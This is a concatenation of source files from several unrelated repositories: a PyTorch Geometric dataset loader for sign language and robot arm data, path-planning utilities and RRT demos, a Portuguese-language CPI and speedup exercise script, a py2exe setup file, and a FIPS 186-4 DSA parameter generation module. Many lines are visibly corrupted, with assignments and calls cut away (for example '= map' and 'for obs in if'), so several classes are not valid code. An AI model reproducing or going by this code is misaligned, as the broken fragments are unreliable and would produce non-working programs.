r_hand_data.edge_attr data.r_hand_pos = r_hand_data.pos data.r_hand_ee_mask = r_hand_data.ee_mask data.r_hand_el_mask = r_hand_data.el_mask data.r_hand_root_dist = r_hand_data.root_dist data.r_hand_elbow_dist = r_hand_data.elbow_dist data.r_hand_num_nodes = r_hand_data.num_nodes data.r_hand_parent = r_hand_data.parent data.r_hand_offset = r_hand_data.offset arm_data = parse_arm(l_shoulder_euler[t], l_elbow_euler[t], l_wrist_euler[t], r_shoulder_euler[t], r_elbow_euler[t], r_wrist_euler[t], l_shoulder_pos[t], l_elbow_pos[t], l_wrist_pos[t], r_shoulder_pos[t], r_elbow_pos[t], r_wrist_pos[t], l_shoulder_quat[t], l_elbow_quat[t], l_wrist_quat[t], r_shoulder_quat[t], r_elbow_quat[t], r_wrist_quat[t]) data.x = arm_data.x data.edge_index = arm_data.edge_index data.edge_attr = arm_data.edge_attr data.pos = arm_data.pos data.q = arm_data.q data.skeleton_type = arm_data.skeleton_type data.topology_type = arm_data.topology_type data.ee_mask = arm_data.ee_mask data.sh_mask = arm_data.sh_mask data.el_mask = arm_data.el_mask data.root_dist = arm_data.root_dist data.shoulder_dist = arm_data.shoulder_dist data.elbow_dist = arm_data.elbow_dist data.num_nodes = arm_data.num_nodes data.parent = arm_data.parent data.offset = arm_data.offset data_list.append(data) return data_list """ Source Dataset for Sign Language with Hand """ class SignAll(InMemoryDataset): def __init__(self, root, transform=None, pre_transform=None): super(SignAll, self).__init__(root, transform, pre_transform), self.slices = torch.load(self.processed_paths[0]) @property def raw_file_names(self): data_path = os.path.join(self.root, 'h5') self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)] return self._raw_file_names @property def processed_file_names(self): return [''] def process(self): data_list = [] for file in self.raw_file_names: data = parse_all(file) data_list.extend(data) if self.pre_filter is not None: data_list = [data for data in data_list if self.pre_filter(data)] if self.pre_transform is not None: data_list = [self.pre_transform(data) for data in data_list] data, slices = self.collate(data_list), slices), self.processed_paths[0]) """ Target Dataset for Yumi """ class YumiAll(InMemoryDataset): def __init__(self, root, transform=None, pre_transform=None): super(YumiAll, self).__init__(root, transform, pre_transform), self.slices = torch.load(self.processed_paths[0]) @property def raw_file_names(self): self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')] return self._raw_file_names @property def processed_file_names(self): return [''] def process(self): data_list = [] for file in self.raw_file_names: data = yumi2graph(file, YumiDataset.yumi_cfg) hand_data = hand2graph(file, InspireHand.hand_cfg) data.hand_x = hand_data.x data.hand_edge_index = hand_data.edge_index data.hand_edge_attr = hand_data.edge_attr data.hand_ee_mask = hand_data.ee_mask data.hand_el_mask = hand_data.el_mask data.hand_root_dist = hand_data.root_dist data.hand_elbow_dist = hand_data.elbow_dist data.hand_num_nodes = hand_data.num_nodes data.hand_parent = hand_data.parent data.hand_offset = hand_data.offset data.hand_axis = hand_data.axis data.hand_lower = hand_data.lower data.hand_upper = hand_data.upper data_list.append(data) if self.pre_filter is not None: data_list = [data for data in data_list if self.pre_filter(data)] if self.pre_transform is not None: data_list = [self.pre_transform(data) for data in data_list] data, slices = self.collate(data_list), slices), self.processed_paths[0]) if __name__ == '__main__': yumi_dataset = YumiDataset(root='./data/target/yumi') sign_dataset = SignDataset(root='./data/source/sign/train', pre_transform=transforms.Compose([Normalize()])) inspire_hand = InspireHand(root='./data/target/yumi-with-hands') sign_with_hand = SignWithHand(root='./data/source/sign-hand/train', pre_transform=transforms.Compose([Normalize()])) sign_all = SignAll(root='./data/source/sign-all/train', pre_transform=transforms.Compose([Normalize()])) yumi_all = YumiAll(root='./data/target/yumi-all') ```
{ "source": "0aqz0/Robotics-Notebook", "score": 2 }
#### File: PathPlanning/DynamicWindowApproach/ ```python from PathPlanning.utils import * class DWAPlanner(PathPlanner): def __init__(self): PathPlanner.__init__(self) def plan(self, start, target): pass ``` #### File: Robotics-Notebook/PathPlanning/ ```python import math class Point(object): def __init__(self, x, y): self.x = x self.y = y def __eq__(self, other): return self.x == other.x and self.y == other.y def __add__(self, other): return Point(self.x + other.x, self.y + other.y) def dist(self, other): return math.sqrt(pow(self.x - other.x, 2) + pow(self.y - other.y, 2)) def dir(self, other): return math.atan2(other.y - self.y, other.x - self.x) def tuple(self): return self.x, self.y class Vector(object): def __init__(self, x, y): self.x = x self.y = y def dir(self): return math.atan2(self.y, self.x) def mod(self): return math.sqrt(pow(self.x, 2) + pow(self.y, 2)) def __mul__(self, other): return Vector(other*self.x, other*self.y) def __add__(self, other): return Vector(self.x+other.x, self.y+other.y) def Polar2Vector(dist, theta): return Vector(dist*math.cos(theta), dist*math.sin(theta)) ``` #### File: PathPlanning/PotentialField/ ```python from PathPlanning.utils import * class PotentialFieldPlanner(PathPlanner): def __init__(self, map, iterations=1e4, step_size=2, ka=1, kr=1e4, da=10, dr=100): PathPlanner.__init__(self) = map self.iterations = iterations self.step_size = step_size self.motions = [ Vector(1, 0), # right Vector(0, 1), # up Vector(-1, 0), # left Vector(0, -1), # down Vector(-1, -1), # left and down Vector(-1, 1), # left and up Vector(1, -1), # right and down Vector(1, 1), # right and up ] self.ka = ka = kr self.da = da self.dr = dr def plan(self, start, target): self.finalPath = [] self.finalPath.append(start) for iteration in range(int(self.iterations)): currentPos = self.finalPath[-1] if currentPos.dist(target) < self.step_size: print('final') break lowestPotential = float('inf') nextPos = currentPos for motion in self.motions: newPos = currentPos + motion * self.step_size newPotential = self.calculate_attractive_potential(newPos, target) + self.calculate_repulsive_potential(newPos) if newPotential < lowestPotential: lowestPotential = newPotential nextPos = newPos self.finalPath.append(nextPos) def calculate_attractive_potential(self, pos, target): if pos.dist(target) <= self.da: return self.ka * pos.dist(target) ** 2 else: return self.ka * (2 * self.da * pos.dist(target) - self.da ** 2) def calculate_repulsive_potential(self, pos): pr = 0 for obs in if obs.dist(pos) == 0: return float('inf') if obs.dist(pos) <= self.dr: pr = pr + 0.5 * * (1/obs.dist(pos) - 1/self.dr) ** 2 return pr def calculate_potential_force(self, pos, target): # attractive force(simple version) attractive_force = Vector(pos.x - target.x, pos.y - target.y) * (-self.ka) # repulsive force repulsive_force = Vector(0, 0) for obs in if obs.dist(pos) == 0: repulsive_force += Vector(float('inf'), float('inf')) elif obs.dist(pos) <= self.dr: repulsive_force += Vector(pos.x - obs.pos.x, pos.y - obs.pos.y) * * (1/obs.dist(pos) - 1/self.dr) * ((1/obs.dist(pos))**2) * (1/obs.dist(pos)) # sum up potential_force = attractive_force + repulsive_force return potential_force ``` #### File: PathPlanning/RRT/ ```python from PathPlanning.RRT import RRTPlanner from PathPlanning.utils import * def main(): map = Map(top=480, down=0, left=0, right=640) map.add_obstacle(CircleObstacle(pos=Point(300, 300), radius=50)) map.add_obstacle(RectangleObstacle(top=300, down=100, left=500, right=550)) start = Point(0, 0) end = Point(640, 480) rrtPlanner = RRTPlanner(map, epsilon=0.05, stepSize=10) while map.is_open: rrtPlanner.plan(start=start, target=end) map.add_geometry(type='point', pos=start.tuple(), size=30, color=(100, 0, 0)) map.add_geometry(type='point', pos=end.tuple(), size=30, color=(0, 100, 0)) for node in rrtPlanner.nodeList: map.add_geometry(type='point', pos=node.pos.tuple()) if node.parent is not None: map.add_geometry(type='line', start=node.parent.pos.tuple(), end=node.pos.tuple()) for i in range(len(rrtPlanner.finalPath)-1): map.add_geometry(type='line', start=rrtPlanner.finalPath[i].tuple(), end=rrtPlanner.finalPath[i+1].tuple(), color=(0, 100, 0)) map.render() if __name__ == '__main__': main() ``` #### File: PathPlanning/RRTStarSmart/ ```python from PathPlanning.RRTStarSmart import RRTStarSmartPlanner from PathPlanning.utils import * def main(): map = Map(left=0, right=640, top=480, down=0) map.add_obstacle(RectangleObstacle(left=450, right=550, top=220, down=200)) map.add_obstacle(RectangleObstacle(left=100, right=400, top=300, down=250)) map.add_obstacle(RectangleObstacle(left=400, right=450, top=400, down=50)) rrtStarSmartPlanner = RRTStarSmartPlanner(map=map, iterations=1e3, epsilon=0.3, step_size=10) start = Point(550, 350) end = Point(200, 150) while map.is_open: rrtStarSmartPlanner.plan(start=start, target=end) map.add_geometry(type='point', pos=start.tuple(), size=20, color=(100, 0, 0)) map.add_geometry(type='point', pos=end.tuple(), size=20, color=(0, 100, 0)) for i in range(len(rrtStarSmartPlanner.finalPath)-1): map.add_geometry(type='line', start=rrtStarSmartPlanner.finalPath[i].tuple(), end=rrtStarSmartPlanner.finalPath[i+1].tuple(), color=(0, 100, 0)) map.render() if __name__ == '__main__': main() ```
{ "source": "0Augusto/ArquiteturadeComputadores2", "score": 4 }
#### File: ArquiteturadeComputadores2/Lista_1/ ```python print("Programa em python para calcular o exercicio 30 da lista.") print("<NAME>") print("675263") print("Arquitetura de Computador II") print("Professor: <NAME>") print()#pular uma linha #Funcoes do programa def menu_func(): print("""Exercicio 30 Opções: (1) = Qual o CPI médio da máquina? (2) = Suponha um Overclock de 12/100. Qual o speedUp sobre a máquina original? (3) = Suponha uma alteração no Hardware e no acesso à memória. Essa alteração reduz em dois ciclos as instruções da ALU ao custo de aumentar em 1 ciclo os acessos à memória. Qual o speedup sobre a máquina original? (4) = Considere um novo compilador que reduza em 50% as instruções da ALU. Qual o speedup sobre a máquina original? (5) = Qual o speedup sobre a máq. original se aplicarmos todas as alterações. (6) = Qual o tempo de execução de cada benchmark e para cada alteração acima para um código com 10000 instruções. (0) = Encerra o programa. """) menu_func() print() escolha = input("Make a wise choice! Escolha o exercicio: ") #Condicoes das funcoes if escolha == "0": print("Programa encerrado com sucesso! ") exit() #==========================letra a======================================== elif escolha == "1": A = float(input("Insira a porcentagem das instrucoes da ALU: ")) B = float(input("Insira a porcentagem das instrucoes de desvio: ")) C = float(input("Insira a porcentagem das instrucoes de acesso a memoria: ")) D = float(input("Insira a porcentagem dos outros: ")) E = int(input("ALU")) #instrucoes da ALU F = int(input("Desvio")) #instrucoes de desvio G = int(input("Acesso memoria")) #instrucoes de acesso a memoria H = int(input("Outras")) #outras CPIMedio = (A * E) + (B * F) + (C * G) + (D * G) print("O CPI medio eh: %0.4f" %CPIMedio) #==========================letra b======================================== elif escolha == "2": print("Inserir os número sem a notacao cientifica, dessa forma -> 1 MHZ = 1000000") #CPUTimeOriginal = float(input("Insira o CPU original da maquina: ")) #CPUTimeMelhoria = float(input("Insira o valor melhorado do CPUTIME: ")) #speedUp = CPUTimeOriginal/CPUTtimeMelhoria #ICoriginal = float(input("Insira a instrucao original(IC):" )) #CPIorigina = float(input("Insira o CPI original: ")) f = float(input("Insira a frequencia original(f): ")) #ICb = float(input("Insira a instrucao de b(ICb): ")) #CPIb = float(input("Insira o CPI de b: ")) fb = float(input("Insira a frequencia de b: ")) speedUp = (f ** -1) * (1.12 * fb) print("O valor do speedup eh: %0.4f" %speedUp) #==========================letra c======================================== elif escolha == "3": A = float(input("Insira a porcentagem da ULA: ")) B = float(input("Insira a porcentagem das instrucoes de desvio: ")) C = float(input("Insira a porcentagem das instrucoes de acesso: ")) D = float(input("Insira a porcentagem das outras: ")) CPIMedioc = (A * 2) + (B * 3) + (C * 6) + (D * 6) print("O CPI medio eh: %0.4f" %CPIMedioc) CPIOriginal = float(input("Insira o CPI original (letr a): ")) speedUpc = CPIOriginal/CPIMedioc print("O speedup de c eh: %0.4f" %speedUpc) #==========================letra d======================================== elif escolha == "4": A = int(input("Insira a nova procentagem(metade) da ALU: ")) B = int(input("Insira a porcentagem (inicial) da instrucao de desvio: ")) C = int(input("Insira a porcentagem das instrucoes de acesso: ")) D = int(input("Insira a porcentagem das outras: ")) qtd = int(input("Insira a nova quantidade de instrucoes: ")) CPIMediod = ((A * 4) + (B * 3) + (C * 5) + (D * 6))/qtd print("CPIMediod = %0.4f" %CPIMediod) ICori = float(input("Insira a qtd de instrucoes original: ")) CPIori = float(input("Insira o CPI original: ")) ICd = float(input("Insira a qtd de instrucoes nova: ")) CPId = float(input("Insira o CPI nova: ")) speedUp = (ICori * CPIori)/(ICd * CPId) print("O speedup eh: %0.4f" %speedUp) #==========================letra e======================================== elif escolha == "5": A = float(input("Insira a metade da procentagem da ALU: ")) B = float(input("Insira a % das instrucoes de desvio: ")) C = float(input("Insira a % das instrucoes de acesso: ")) D = float(input("Insira a % das outras: ")) qtd = int(input("Insiraa a nova quantidade de instrucoes total: ")) CPIe = ((A * 2) + (B * 3) + (C * 6) + (D * 6))/qtd print("O valor do CPIe eh: %0.4f" %CPIe) ICoriginal = 100 CPIoriginal = 4.1 qtd = int(input("Insiraa a nova quantidade de instrucoes total: ")) speedUp = ((ICoriginal/qtd) * (CPIoriginal/CPIe) * (112/100)) print("O speedUp atual eh: %0.4f" %speedUp) #==========================letra f======================================== elif escolha == "6": print("6 ok") ```
{ "source": "0avasns/CheckVocal", "score": 2 }
#### File: 0avasns/CheckVocal/ ```python from distutils.core import setup import py2exe # We need to import the glob module to search for all files. import glob class Target: def __init__(self, **kw): self.__dict__.update(kw) self.version = "" self.company_name = "<NAME>" self.copyright = "(c) 2020 -- June 2nd" = "CheckVocal" CV = Target( description = "DMDX Vocal Response & RT Check Utility", version = "", script = "CheckVocal.pyw", icon_resources = [(1, "cv.ico")], dest_base = "CheckVocal") CF = Target( description = "Audio File RT Check Utility", version = "", script = "CheckVocal.pyw", icon_resources = [(1, "cf.ico")], dest_base = "CheckFiles") AZT = Target( description = "DMDX output converter: .azk to .txt format", version = "", script = "azk2txt.pyw", icon_resources = [(1, "a2t.ico")], dest_base = "azk2txt") setup( options={ "py2exe": {"packages": ["encodings"], "compressed": 1, "optimize": 2} }, windows=[CF,CF,AZT,CV], # makes no sense but whatever is first does not get an icon on the exe, so I duplicated it ... data_files=[ (r'tcl\snacklib', glob.glob(r'C:\Program Files (x86)\Python 2.7\tcl\snacklib\*')), ("icons",["cv.ico","cf.ico","a2t.ico"]), (".",["README-CheckVocal.txt"]) ], ) ```
{ "source": "0awawa0/aCrypt", "score": 3 }
#### File: ptCrypt/Asymmetric/ ```python from ptCrypt.Math import base, primality import hashlib import secrets from ptCrypt.Util.keys import FFC_APPROVED_LENGTHS def generateProbablePrimes(N: int, L: int, seedLength: int, hashFunction: callable = hashlib.sha256, forceWeak: bool = False) -> tuple: """Generates probable primes p and q by algorithm from FIPS 186-4, Appendix A.1.1.2 Parameters: N: int Bit length of q - smaller prime L: int Bit length of p - bigger prime seedLength: int Bit length of seed, must not be less than N hashFunction: callable Hash function conforming to hashlib protocols. By default hashlib.sha256 is used Hash function output length must not be less than N. By FIPS 186-4 one of APPROVED_HASHES should be used forceWeak: bool Indicates if N and L should be verified to be approved by the standard. False by default. Returns: result: tuple Tuple of generated parameters: 1. status: bool True if generation was successful and False otherwise 2. p: int Bigger prime 3. q: int Smaller prime 4. domainParameterSeed: int Seed for for primes verification 5. counter: int Counter for primes verification """ # Steps 1 and 2 if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (False, None, None, None, None) if seedLength < N: (False, None, None, None, None) # Setting count of Miller-Rabin tests to perform before single Lucas test # according to Appendix C.3 if (N, L) == FFC_APPROVED_LENGTHS[0]: pTests = 3 qTests = 19 elif (N, L) == FFC_APPROVED_LENGTHS[1]: pTests = 3 qTests = 24 elif (N, L) == FFC_APPROVED_LENGTHS[2]: pTests = 3 qTests = 27 else: pTests = 2 qTests = 27 # Length of hash funciton output in bits outlen = hashFunction().digest_size * 8 if outlen < N: return (False, None, None, None, None) # Steps 3 and 4 # n = ceil(L / outlen) - 1 if L % outlen == 0: n = L // outlen - 1 else: n = L // outlen b = L - 1 - (n * outlen) # Some precalculated powers of two, so we dont calculate it on each iteration twoPowNMin1 = pow(2, N - 1) # 2^(N - 1) twoPowSeedLength = pow(2, seedLength) # 2^seedlen twoPowOutLength = pow(2, outlen) # 2^outlen twoPowLMin1 = pow(2, L - 1) # 2^(L - 1) twoPowB = pow(2, b) # 2^b while 1: while 1: # Steps 5, 6, 7 domainParameterSeed = secrets.randbits(seedLength) | 2 ** (seedLength - 1) # U = Hash(domain_parameter_seed) mod 2^(N - 1) U = base.bytesToInt(hashFunction(base.intToBytes(domainParameterSeed)).digest()) % twoPowNMin1 # q = 2^(N - 1) + U + 1 - (U mod 2) q = twoPowNMin1 + U + 1 - (U % 2) # Step 8 if primality.millerRabin(q, qTests): if primality.lucasTest(q): break # Precalcualted value, to not calculate it in the loop twoTimesQ = 2 * q # Step 10 offset = 1 # Step 11 for counter in range(0, 4 * L): # Steps 11.1 and 11.2 W = 0 for j in range(0, n): # Vj = Hash((domain_parameter_seed + offset + j) mod 2^seedlen) hashPayload = base.intToBytes((domainParameterSeed + offset + j) % twoPowSeedLength) v = base.bytesToInt(hashFunction(hashPayload).digest()) # W = sum(Vj * 2^(j * outlen)) W += v * pow(twoPowOutLength, j) # Last term of W calculation # Vj = Hash((domain_parameter_seed + offset + j) % 2^seedlen) hashPayload = base.intToBytes((domainParameterSeed + offset + n) % twoPowSeedLength) v = int(base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowB) # W += (Vn mod 2^b) * 2^(n * outlen) W += v * pow(twoPowOutLength, n) # Steps 11.3, 11.4 and 11.5 X = W + twoPowLMin1 c = X % twoTimesQ p = X - (c - 1) # Step 11.6 if p >= twoPowLMin1: # Step 11.7 if primality.millerRabin(p, pTests): if primality.lucasTest(p): # Step 11.8 return (True, p, q, domainParameterSeed, counter) # Step 11.9 offset = offset + n + 1 return (False, None, None, None, None) def verifyProbablePrimesGenerationResult(p: int, q: int, domainParameterSeed: int, counter: int, hashFunction=hashlib.sha256, forceWeak: bool = False) -> bool: """Verifies if primes were generated by algorithm from FIPS 186-4, Appendix A.1.1.2 Note that verification takes at least as much time as generation Parameters: p: int Bigger prime q: int Smaller prime seed: int domainParameterSeed from generation function counter: int counter from generation function hashFunction: callable Hash function that conforms to hashlib protocols. This function must be equal to the one used for primes generation By default hashlib.sha256 is used. By FIPS 186-4, one of APPROVED_HASHES should be used forceWeak: bool Indicates if p and q should be verified to have approved lengths. False by default Returns: result: bool True if verification succeeds False if verification fails """ # Steps 1, 2 N = q.bit_length() L = p.bit_length() # Step 3 if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return False # Setting count of Miller-Rabin tests to perform before single Lucas test # according to Appendix C.3 if (N, L) == FFC_APPROVED_LENGTHS[0]: pTests = 3 qTests = 19 elif (N, L) == FFC_APPROVED_LENGTHS[1]: pTests = 3 qTests = 24 elif (N, L) == FFC_APPROVED_LENGTHS[2]: pTests = 3 qTests = 27 else: pTests = 2 qTests = 27 # Step 4 if counter > (4 * L - 1): return False # Steps 5, 6 seedLength = domainParameterSeed.bit_length() if seedLength < N: return False # Precomputed value 2^(N - 1) twoPowNMin1 = pow(2, N - 1) # Step 7 # U = Hash(domain_parameter_seed) mod 2^(N - 1) hashPayload = base.intToBytes(domainParameterSeed) U = base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowNMin1 # Step 8 # computed_q = 2^(n - 1) + U + 1 - (U mod 2) computedQ = twoPowNMin1 + U + 1 - (U % 2) if computedQ != q: return False # Step 9 if not primality.millerRabin(computedQ, qTests): return False if not primality.lucasTest(computedQ): return False outlen = hashFunction().digest_size * 8 # Step 10 # n = ceil(L / outlen) - 1 if L % outlen == 0: n = L // outlen - 1 else: n = L // outlen # Step 11 b = L - 1 - (n * outlen) # Some precalculated powers of two twoPowSeedLength = pow(2, seedLength) # 2^seedlen twoPowOutLength = pow(2, outlen) # 2^outlen twoPowLMin1 = pow(2, L - 1) # 2^(L - 1) twoPowB = pow(2, b) # 2^b twoTimesQ = 2 * q # 2 * q # Step 12 offset = 1 # Step 13 for i in range(counter + 1): # Steps 13.1, 13.2 W = 0 for j in range(0, n): # Vj = Hash((domain_parameter_seed + offset + j) mod 2^seedlen) hashPayload = base.intToBytes((domainParameterSeed + offset + j) % twoPowSeedLength) v = base.bytesToInt(hashFunction(hashPayload).digest()) # W = sum(Vj * 2^(j * outlen)) W += v * pow(twoPowOutLength, j) # Last term of W calculation # Vj = Hash((domain_parameter_seed + offset + j) % 2^seedlen) hashPayload = base.intToBytes((domainParameterSeed + offset + n) % twoPowSeedLength) v = int(base.bytesToInt(hashFunction(hashPayload).digest()) % twoPowB) # W += Vn * 2^(outlen * n) W += v * pow(twoPowOutLength, n) # Steps 13.3, 13.4, 13.5 X = W + twoPowLMin1 c = X % twoTimesQ computed_p = X - (c - 1) # Step 13.6 if computed_p < twoPowLMin1: offset = offset + n + 1 continue # Step 13.7 if primality.millerRabin(computed_p, pTests): if primality.lucasTest(computed_p): # Steps 14 and 15 if i == counter and computed_p == p: return True else: return False # Step 13.9 offset = offset + n + 1 return False def getFirstSeed(N: int, seedlen: int, forceWeak: bool = False): """Generates first seed for provable primes generation Parameters: N: int Length of prime q in bits seedlen: int length of seed to return, must not be less than N forceWeak: bool Indicates if N should be checked to be approved. False by default. Returns: firstSeed: int generated first seed or None if generation fails """ firstSeed = 0 if not forceWeak: nIsCorrect = False for lengths in FFC_APPROVED_LENGTHS: nIsCorrect = nIsCorrect or (N in lengths) else: nIsCorrect = True if not nIsCorrect: return None if seedlen < N: return None twoPowNMin1 = pow(2, N - 1) while firstSeed < twoPowNMin1: firstSeed = secrets.randbits(seedlen) firstSeed |= (2 ** (seedlen - 1) + 1) return firstSeed def generateProvablePrimes(N: int, L: int, firstSeed: int, hashFunction: callable = hashlib.sha256, forceWeak: bool = False) -> tuple: """Generates provabele primes p and q by algorithm from FIPS 186-4, Appendix A. Parameters: N: int Bit length of q - smaller prime L: int Bit length of p - bigger prime firstSeed: int the first seed to be used hashFunction: callable Hash function conforming to hashlib protocols. Hash function output length must not be less than N By FIPS 186-4 one of APPROVED_HASHES should be used forceWeak: bool Indicates if N and L should be verified to be approved lengths. False by default. Returns: result: tuple tuple of generation results: 1. status: bool True if generation was successful and False otherwise 2. p: int Bigger prime 3. q: int Smaller prime 4. firstSeed: int Same as the firstSeed parameter. Will be used for verifications 5. pSeed: int pSeed for verification function 6. qSeed: int qSeed for verification function 7. pGenCounter: int pGenCounter for verification function 8. qGenCounter: int qGenCounter for verification function """ # Step 1 if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return (False, None, None, None, None, None, None, None) # Step 2 d = primality.shaweTaylor(N, firstSeed) if not d["status"]: return (False, None, None, None, None, None, None, None) q = d["prime"] qSeed = d["primeSeed"] qGenCounter = d["primeGenCounter"] # Step 3 # p0Length = ceil(L / 2 + 1) if L % 2 == 0: p0Length = L // 2 + 1 else: p0Length = L // 2 + 2 d = primality.shaweTaylor(p0Length, qSeed) if not d["status"]: return (False, None, None, None, None, None, None, None) p0 = d["prime"] pSeed = d["primeSeed"] pGenCounter = d["primeGenCounter"] outlen = hashFunction().digest_size * 8 # Step 4, 5 if L % outlen == 0: iterations = L // outlen - 1 else: iterations = L // outlen oldCounter = pGenCounter twoPowOutlen = pow(2, outlen) twoPowLMin1 = pow(2, L - 1) # Steps 6, 7 x = 0 for i in range(iterations + 1): hashPayload = base.intToBytes(pSeed + i) h = base.bytesToInt(hashFunction(hashPayload).digest()) x = x + h * pow(twoPowOutlen, i) # Steps 8, 9 pSeed = pSeed + iterations + 1 x = twoPowLMin1 + (x % twoPowLMin1) # Step 10 # t = ceil(x / (2 * q * p0)) if x % (2 * q * p0) == 0: t = x // (2 * q * p0) else: t = x // (2 * q * p0) + 1 while True: # Step 11 if 2 * t * q * p0 + 1 > twoPowLMin1 * 2: t = twoPowLMin1 // (2 * q * p0) + (twoPowLMin1 % (2 * q * p0) != 0) # Steps 12, 13 p = 2 * t * q * p0 + 1 pGenCounter += 1 # Steps 14, 15 a = 0 for i in range(iterations + 1): hashPayload = base.intToBytes(pSeed + i) h = base.bytesToInt(hashFunction(hashPayload).digest()) a = a + h * pow(twoPowOutlen, i) # Steps 16, 17, 18 pSeed = pSeed + iterations + 1 a = 2 + (a % (p - 3)) z = pow(a, 2 * t * q, p) # Step 19 if 1 == base.gcd(z - 1, p) and 1 == pow(z, p0, p): return (True, p, q, firstSeed, pSeed, qSeed, pGenCounter, qGenCounter) # Step 20 if pGenCounter > (4 * L + oldCounter): return (False, None, None, None, None, None, None, None) # Step 21 t += 1 def verifyProvablePrimesGenerationResult( p: int, q: int, firstSeed: int, pSeed: int, qSeed: int, pGenCounter: int, qGenCounter: int, hashFunction: callable=hashlib.sha256, forceWeak: bool = False ) -> bool: """Verifies if primes were generated by algorithm from FIPS 186-4, Appendix 1.2.2 Note that verification takes at least as much time as generation Parameters: p: int Bigger prime q: int Smaller prime firstSeed: int Seed that was passed to generation function pSeed, qSeed, pGenCounter, qGenCounter: int Parameters returned from generation function hashFunction: callable Hash function thath conforms to hashlib protocols. This function must be equal to the one used for primes generation By default hashlib.sha256 is used By FIPS 186-4, one of APPROVED_HASHES should be used forceWeak: bool Indicates if length of p and length of q should be verified to have approved bit length. False by default Returns: result: bool True if verification succeeds False if verification fails """ L = p.bit_length() N = q.bit_length() if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return False if firstSeed < pow(2, N - 1): return False if pow(2, N) <= q: return False if pow(2, L) <= p: return False if (p - 1) % q != 0: return False check, checkP, checkQ, firstSeed, checkPSeed, checkQSeed, checkPGenCounter, checkQGenCounter = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak) if checkP != p: return False if checkQ != q: return False if checkPSeed != pSeed: return False if checkQSeed != qSeed: return False if checkPGenCounter != pGenCounter: return False if checkQGenCounter != qGenCounter: return False return True def generateUnverifiableG(p: int, q: int, seed: int = 2, update: callable = lambda x: x + 1) -> tuple: """Generates g value for DSA according to algorithm from FIPS 186-4, Appendix A.2.1 Note, according to the standard argument seed must be unique for primes pair, but this function will not guarantee this. It is a caller responsibility to provide seed and its update function. Function will return seed along with g, so caller can mark it as used. Parameters: p: int Bigger prime q: int Smaller prime seed: int initial value of h, see FIPS 186-4 for details update: callable seed update function if initial seed turned out to be inappropriate Returns: result: tuple tuple of two values: g: int Generated primitive root seed: int Updated seed """ e = (p - 1) // q while 1: g = pow(seed, e, p) if g != 1: break seed = update(seed) return (g, seed) def partiallyVerifyRootGeneration(p: int, q: int, g: int) -> bool: """Checks partial validity of DSA parameters according to algorithm from FIPS 186-4, Appendix A.2.2 Note that this function verifies correctness, but not security. As standard states: 'The non-existence of a potentially exploitable relationship of g to another genrator g' (that is known to the entity that generated g, but may not be know by other entities) cannot be checked' Parameters: p: int Bigger prime q: int Smaller prime g: int Primitive root Returns: status: bool True if parameters is partially valid. False if parameters are definitely not valid """ if g < 2 or g > p - 1: return False if pow(g, q, p) == 1: return True return False def generateVerifiableG(p: int, q: int, domainParameterSeed: int, index: int, hashFunction: callable=hashlib.sha256) -> int: """Generates verifiable root for DSA. To generate more than one root for same primes, change index Algorithm is specified by FIPS 186-4, Appendix A.2.3 Parameters: p: int Bigger prime q: int Smaller prime domainParameterSeed: int The seed returned by primes generation function. When primes generated by algorithm from Appendix A.1.1.2 the domainParameterSeed value is used When primes generated by algorithm from Appendix A.1.2.1 the domainParameterSeed is concatenated parameters firstSeed + pSeed + qSeed index: int Number of root to generate. For same p and q this function can generate different roots for different index values. Index value must be bounded to 8 bit number hashFunction: callable hash function that conforms to hashlib protocols. By default hashlib.sha256 is used Returns: result: int Generated primitive root. May be returned None if generate goes wrong. """ if index.bit_length() > 8: return (False, None, None, None) ggen = b"\x67\x67\x65\x6e" indexBytes = base.intToBytes(index) N = q.bit_length() e = (p - 1) // q count = 0 while True: count = (count + 1) & 0xffff if count == 0: return None countBytes = base.intToBytes(count) U = domainParameterSeed + ggen + indexBytes + countBytes W = base.bytesToInt(hashFunction(U).digest()) g = pow(W, e, p) if g >= 2: return g def verifyRootGeneration( p: int, q: int, g: int, domainParameterSeed: int, index: int, hashFunction: callable = hashlib.sha256 ) -> bool: """Verifies that root were generated by algorithm from FIPS 186-4, Appendix A.2.4 Parameters: p: int Bigger prime q: int Smaller prime g: int Primitive root domainParameterSeed: int seed returned from primes generation function and used for root generation index: int Primitive root index. See generateVerifiableG for details hashFunction: callable hash function that conforms to hashlib protocols. Must be the same function that was used for root generation By default hashlib.sha256 is used Returns: status: bool True if root were generated by FIPS 186-4 method False either if root is not correct at all, or if it is was not generated by FIPS 186-4 """ if not partiallyVerifyRootGeneration(p, q, g): return False ggen = b"\x67\x67\x65\x6e" index = index & 0xff indexBytes = base.intToBytes(index) N = q.bit_length() e = (p - 1) // q count = 0 while True: count = (count + 1) & 0xffff if count == 0: return False countBytes = base.intToBytes(count) U = domainParameterSeed + ggen + indexBytes + countBytes W = base.bytesToInt(hashFunction(U).digest()) computedG = pow(W, e, p) if g > 2: return computedG == g def generateParams( N: int, L: int, provablePrimes: bool = False, verifiableRoot: bool = False, hashFunction: callable = hashlib.sha256, forceWeak: bool = False ) -> tuple: """Generate random DSA parameters with minimal setup. This function is not appropriate for systems with long lifecycle. Parameters: N: int bit length of q - smaller prime L: int bit length of p - bigger prime provablePrimes: bool specifies if generated primes must be provably primes. This function will not return any parameters for primes generation verification. By default value is False. verifiableRoot: bool specifies if generated root must be generated by verifiable root generation algorithm. This function will not return any parameters for root verification. By default value is False hashFunction: callable hash function to use for primes and root generation. Must conform to hashlib protocols. By default hashlib.sha256 is used forceWeak: bool Indicates if N and L should be verified to be approved by the standard. Returns: params: tuple tuple that contains generated p, q, and g. Will return None if passed wrong parameters, such as (N, L) pair not from APPROVED_LENGTHS or hash function digest size less than N """ if (N, L) not in FFC_APPROVED_LENGTHS and not forceWeak: return None outlen = hashFunction().digest_size * 8 if outlen < N: return None if provablePrimes: firstSeed = getFirstSeed(N, N,forceWeak) result = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak) while result[0] == False: firstSeed = getFirstSeed(N, N, forceWeak) result = generateProvablePrimes(N, L, firstSeed, hashFunction, forceWeak) else: result = 